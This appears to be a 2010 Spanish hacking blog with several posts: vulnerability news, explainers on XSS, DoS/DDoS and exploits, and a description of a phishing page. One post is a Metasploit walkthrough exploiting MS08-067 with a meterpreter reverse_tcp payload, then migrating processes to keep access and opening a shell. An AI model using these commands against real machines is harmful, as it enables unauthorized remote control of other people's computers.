Mostrando entradas con la etiqueta Bugs y Exploits. Mostrar todas las entradas
Mostrando entradas con la etiqueta Bugs y Exploits. Mostrar todas las entradas

jueves, 25 de marzo de 2010

Multiples Vulnerabilidades en google Chrome

Se han anunciado un total de nueve vulnerabilidades en Google Chrome, el navegador de Google. Un atacante remoto podría emplear estos problemas para evitar restricciones de seguridad, descubrir información sensible o comprometer un sistema vulnerable.

El primer problema se debe a errores de punteros en la sandbox mientras que otro problema se debe a metadatos persistentes como Web Databases y STS. Más problemas se dan porque las cabeceras http se procesan antes de la comprobación de navegación segura (SafeBrowsing).

Una vulnerabilidad de ejecución remota de código se produce al procesar SVG mal construidos. Otro problema de desbordamiento de entero en objetos JavaScript WebKit, también podría emplearse para ejecutar código arbitrario.

Otros problemas están relacionado con los diálogos de autenticación http básica y de descargas. Una última vulnerabilidad reside en el tratamiento de elementos SVG vacíos.

Se recomienda actualizar a Google Chrome versión 4.1.249.1036, disponible 



Fuente http://www.foro.portalhacker.net

viernes, 19 de marzo de 2010

XSS en Web Site


Hola, me tope hoy con una web vulnerable a XSS y como estaba aburrido decidi postearlo:


¿Que es XSS? (SEGUN WIKI)


Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, Hojas de estilo) Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o Javascript, en el contexto de otro sitio web (y recientemente esto se podría clasificar más correctamente como "distintos orígenes").
Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web No se limita solamente a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada).

Directa (Persistente): este tipo de XSS comúnmente filtrado, y consiste en invadir código HTML peligroso en sitios que así lo permiten

Indirecta (Reflejada): este tipo de XSS consiste en modificar valores que la aplicacion web utiliza para pasar variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podría extenderse al DOM del navegador).

Cookie: Fragmento de informacion que se almacena en el disco duro del visitante de una pagina web a traves de su navegador.

Usos mas frecuentas de Cookies:

Cuando un user ingresa un usuario y contraseña en una web, la cookie almacena los datos asi no tiene que andar escribiendola dia y noche :P

Conseguir Info sobre los datos de navegacion del user 

Bueno, aca dejo la screen:


Aclaro, que este tutorial, fue una introduccion a XSS, todavia me falta aprender a mi PHP, asi que todavia no prefiero meterme con WebHacking.. excepto con SqLi xD

NoS VeMoS Dr [F]

domingo, 14 de marzo de 2010

MetaSploit FrameWork 3.3

Hola, este tutorial, es para gente que ya tenga instalado el metasploit framework en su computadora y que sepa el manejo basico de este Soft.

primero:

¿De que se trata la vulnerabilidad MS08_067_NETAPI?

Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.

La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello. 





Aca dejo (en forma entera) como explotar la vulnerabilidad  y mas abajo lo detallare con fotos.


use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit


y listo ya ingresamos


Bueno Comenzemos explotando la vulnerabilidad:




Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.

Aca cargamos el exploit:

use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103

vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip

Despues de cargar el HOST remoto, cargo el Payload .
en mi caso

set payload windows/meterpreter/reverse_tcp

lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes

y le digo a que maquina quiero que se conecte meterpreter

set LHOST 192.168.1.101

uso el comando exploit para empezar a explotar la vulnerabilidad

Aca esta creando la sesion meterpreter



Sesion meterpreter abierta...

Con el comando ps veo la lista de procesos

y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD



Y ahora migramos a otro proceso el nombre a migrar del procesos

ej: migrate PID



¿se ve ?

migrate 728 que es el proceso del freeze en el ciber :D

y ahora abrire una shell i comprobare que es la Ip 192.168.1.103


Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D

Tutorial By Dr [F]

sábado, 13 de marzo de 2010

Microsoft me rio de la seguridad

Bueno, aca dejo algo que me intereso mucho cuando lo vi, y advierto a cualquier usuario (depaso)


Fuente: Expansión.com


 Microsoft alerta sobre el peligro de pulsar F1






"La compañía Microsoft  alerta a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda'F1', ya que, de hacerlo, podrían sufrir graves problemas de seguridad.

En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.

Según recoge 'ComputerWorld', en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado. "La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE. Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla 'F1', código arbitrario podría ser ejecutado en el contexto de seguridad del usuario", explica el comunicado de seguridad.

Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP con el navegador Internet Explorer.

Hasta que no este preparado el parche de seguridad, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.

Según publica 'Computer World', un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía "está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes".

Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que "Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes"


Lo mas gracioso de esto, es que MICROSOFT no catalogo la vulnerabilidad como critica porque segun Ellos, el atacante tiene que avisar a la victima que tiene que pulsar una tecla -.-

Saluudos

Dr [F]

jueves, 11 de febrero de 2010

Boletines de Seguridad Microsoft Febrero

este martes Microsoft ha publicado trece boletines de seguridad (del MS10-003 al MS10-015) correspondientes a su ciclo habitual de actualizaciones. Según la propia clasificación de Microsoft cinco de los boletines presentan un nivel de gravedad "crítico", siete son clasificados como "importantes" y el restante se considera "moderado". En total se han resuelto 25 vulnerabilidades, una de ellas reportada por Hispasec.

Los boletines "críticos" son:

  • MS10-006: Actualización para corregir dos vulnerabilidades en el cliente SMB que podrían permitir la ejecución remota de código si un atacante envía una respuesta SMB especialmente creada a una petición de cliente SMB. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
  • MS10-007: Actualización destinada a corregir una vulnerabilidad en el controlador del shell de Windows que podría permitir la ejecución remota de código arbitrario, el problema reside en la validación incorrecta de la entrada enviada a la función de la API ShellExecute. Afecta a Microsoft Windows 2000, Windows XP y Windows Server 2003.
  • MS10-008: Se trata de una actualización de seguridad acumulativa de bits de interrupción de ActiveX que además corrige una vulnerabilidad de ejecución remota de código en el control ActiveX de Microsoft Data Analyzer. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
  • MS10-009: Boletín destinado a corregir cuatro vulnerabilidades en TCP/IP de Windows, la más grave de ellas podría permitir la ejecución remota de código si se envían paquetes especialmente diseñados a un equipo con IPv6 habilitado. Afecta a Microsoft Windows Windows Vista y Windows Server 2008.
  • MS10-013: Actualización destinada a corregir una vulnerabilidad en Microsoft DirectShow relacionada con la forma en que se analizan los archivos AVI. Esta vulnerabilidad podría permitir la ejecución remota de código arbitrario si un usuario abre un archivo AVI especialmente creado. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.

Los boletines clasificados como "importantes" son:

  • MS10-003: Actualización que soluciona una vulnerabilidad en Microsoft Office que podría permitir la ejecución remota de código si un usuario abre un archivo de Office especialmente diseñado. Afecta a Microsoft Office XP y Microsoft Office 2004 para Mac.
  • MS10-004: Actualización que soluciona seis vulnerabilidades en Microsoft Office PowerPoint, que podrían permitir la ejecución remota de código si un usuario abre un archivo Power Point especialmente creado. Afecta a Microsoft Office XP, 2003 y Microsoft Office 2004 para Mac.
  • MS10-010: Actualización destinada a corregir una vulnerabilidad en Windows Server 2008 Hyper-V, que podría permitir provocar una denegación de servicio si un usuario ejecuta una secuencia especial de instrucciones con formato incorrecto en una de las máquinas virtuales invitadas que hospede el servidor Hyper-V.
  • MS10-011: Actualización destinada a solucionar una vulnerabilidad elevación de privilegios a través del subsistema de tiempo de ejecución de cliente-servidor de Windows (Client/Server Run-time Subsystem, CSRSS). Esta vulnerabilidad fue reportada por Matthew "j00ru" Jurczyk y Gynvael Coldwind, de Hispasec.
  • MS10-012: En este boletín se ofrece una actualización para resolver cuatro vulnerabilidades en el servidor SMB, la más grave de ellas podría permitir la ejecución remota de código si un atacante envía a un sistema afectado un paquete SMB especialmente diseñado. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
  • MS10-014: En este boletín se corrige una vulnerabilidad de denegación de servicio en las implementaciones de Kerberos.
  • MS10-015: Esta actualización de seguridad resuelve dos vulnerabilidades en el kernel de Windows. Afecta a Windows 2000, Windows XP, Windows Server 2003, Windows Vista y Windows Server 2008

Por último, la vulnerabilidad considerada como "moderada":

  • MS10-005: Actualización publicada para evitar una vulnerabilidad de ejecución remota de código en Microsoft Paint si un usuario visualiza con este programa un archivo JPEG especialmente manipulado. Afecta a Microsoft Windows 2000, Windows XP y Windows Server 2003.

Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche. Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible.

Fuente: HispaSec & CPH

Bueno, me decidi me voi a cambiar a Linux, ya que Win BUG me tiene arto, siempre fallos de seguridad, y toda la bola... nos vemos Bill

miércoles, 10 de febrero de 2010

Ataque DoS y DDoS

Bueno, para entender que es un ataque DDoS, primero debemos saber que es un ataque DoS.

¿Que es un ataque DoS ?

Bueno, un servidor (ya sea una web o un blog) esta preparado para soportar un numero de conexiones simultaneas. Cuando excede el numero de estas conexiones pueden llegar a pasar dos cosas:

1) Que no responda a mas peticiones entrantes

2) Que se desconecte de la red (queda offline)

Entonces si un ordenador, malintencionado, solicita un numero de peticiones mayores a las que soporta nuestro servidor puede llegar a saturar los puertos y provocar que este deje de funcionar correctamente. Este es el ataque DoS (Denial of service) que se traduce como denegacion de servicio




Como se aprecia en la imagen el ordenador atacante satura al ordenador victima (consumiendo sus recursos) y asi
queda imposibilitado un ordenador comun para acceder a la web.
Los recursos que se consumen son acho de banda, memoria ram, etc
Tambien puede pasar que el ataque sea tan excesivo (consuma demasiados recursos) que el administrador de la web
la desconecte de internet hasta que haya pasado el ataque o hasta que lo haya logrado repeler.



En la imagen, el servidor se esta desconectando de internet (no acepta ninguna conexion) entonces el DoS falla.
¿Como se puede prevenir este ataque?
Bloqueando la Ip desde la web ( del atacante claro)

Ataque DDoS:

Cuando el ataque se realiza desde un solo ordenador, es facil de bloquear, se detecta la IP y se bloquea y listo
pero existe una variante de el ataque DoS que es cuando se ataca al servidor de distintos ordenadores distribuidos en
diferentes puntos del mundo. Este ataque DDos (distribute denial of service) Denegacion de servicio distribuida
es una ampliacion del DoS
Este tipo de ataque se lleva a cabo con ordenadores zombie, que son ordenadores comunes controlados por un software o
troyano (por una tercera persona) que permite manipularlos. De esta forma es posible coordinar un ataque de miles
de ordenadores contra una web.


¿Como defendernos de un DDoS?

si tienes un hosting compartido (como puede ser webcindario.com, etc), sera el host que se tendra que defender y no tu.
ya que no tendras acceso al servidor atacado. Pero en cambio si te encuentras en un servidor dedicado/virtual
(que sea tuyo completamente), tendras que recurrir a diversas herramientas complejas no aptas para usuarios con
escasos conocimientos en esta area.
Para recurrir a estas herramientas puede ingresar a


No dejo herramientas para realizar DDoS, esto en el mundo Hacker, se considera muy lammer e inapropiado ya que
haces gastar mucho tiempo a los administradores y aveces pueden llegar a perder el trabajo de 5 dias..
Aprende y construye no destruyas




PD: Ya sos conciente de lo que podes causar no lo hagan

jueves, 4 de febrero de 2010

Test de Vulnerabilidades

Hola, navegando por la red, me encontre con este sitio http://secunia.com/vulnerability_scanning/online, la funcion de este, es mostrar vulnerabilidades de programas que poseas en tu ordenador. Lo copado es que te pone el link de descarga de Actualizaciones y parches para el sistema operativo y para los programas vulnerables
Esto, se ejecuta gracias a un navegador a traves de Java


Creo que esta claro el como usar esta web y todo pero por las dudas dejo una screen


miércoles, 3 de febrero de 2010

¿Que es una vulnerabilidad?


Hola, despues de mucho tiempo de vacaciones, volvi a este facsinante mundo Under
espero que no me hayan extrañado (mucho) :P
Bueno, ahora con ustedes el tema mas o uno de los mas importantes en el mundo del Hacking

Los Bugs y Exploits

pero primero:

¿Que es un Vulnerabilidad?


La mejor palabra que podríamos usar para definir a una vulnerabilidad es debilidad. Sin duda, una vulnerabilidad hace que la seguridad se vea disminuida o, en algunos casos, que se vea nula. Es por ello que es correcto afirmar el concepto de debilidad.

Realmente hay un gran debate sobre esta terminología, debido a que si nadie conoce el agujero de seguridad, este no existe. Por eso se parte de la hipótesis de que todos los sistemas son inseguros, por la sencilla razón de que lo creo una p
ersona o un grupo de ellas y, por consiguiente, el error siempre esta, solo hace falta descubrirlo.
Tal vez nos preguntemos ¿porque no partir de la hipótesis de que los sistemas son seguros, hasta que se demuestre lo contrario? Es una pregunta interesante que todo el mundo se formula, pero hay un punto muy delicado y que es el argumento propicio para saciar esa intriga: nadie puede poder las manos en el fuego asegurando que el sistema que fabrica es 100% seguro, ya que a la larga se dará cuenta de que no va poder escribir ma
s el código del programa, porque los recursos que utilizaba para crearlo se le quemaron.


Con esta ironía, suponemos que todo sistema tiene una debilidad, desde la mejor caja fuerte hasta una bomba nuclear activada. Todos tienen un método por el cual el sistema de seguridad se desactiva, se evado o se rompe.

Ahora que ya sabemos lo basico, podemos comenza
r co
n lo lindo:

¿Que es un Exploit?

Esta palabra viene el Ingles TO EXPLOIT (explotar)

Exploit se llama a un programa o a parte de un progr
ama malicioso que se trata de aprovechar de alguna vulnerabilidad en la escritura de un programa.
El fin de este puede ser la destruccion o neutralizacion del sistema atacado, aunque en realidad el objetivo principal es conseguir acceso no autorizado al sistema con el fin de usarlo en beneficio propio o para ataques de terceros

Los exploits se caracterizan segun las categorias
de vulnerabilidades utilizadas:

*Vulnerabilidad de desbordamiento de Buffer (buffer overflow)
* Vulnerabilidad de Condicion de Carrera (race condition)
*Vulnerabilidad de error de formato de cadena (Bug string condition)
*Vulnerabilidad de Cross Site Scriptin (XSS)
*Vulnerabilidad de Injeccion SQL (SQLi)
*Vulnerabilidad de Injeccion De Caracteres (CRLF)
*Vulnerabilidad de Denegacion de Servicio
*Vulnerabilidad de Injeccion Multimple de hTML (Multi
ple HTML injection)


¿Que es un XPLOIT?

Fake Mail

Fake Mail, es enviar un correo electronico falseando el remitente se trata de una tecnica usada en ingenieria social para poder obtener el password de la victima



Este es un XPLOIT antiguo de hotmail. Al enviar un mail a la victima y cuando la victima hacia click sobre este la redireccionaba automaticamente al XPLOIT, el cual era una mascara y le pedia los datos (usuario y contraseña), luego de ingresar les mandaba un error y los redireccionaba a la verdadera pagina de hotmail

PD: Este posteo fue sacado de la mejor comunidad Under.. Foro Portal Hacker

http://foro.portalhacker.com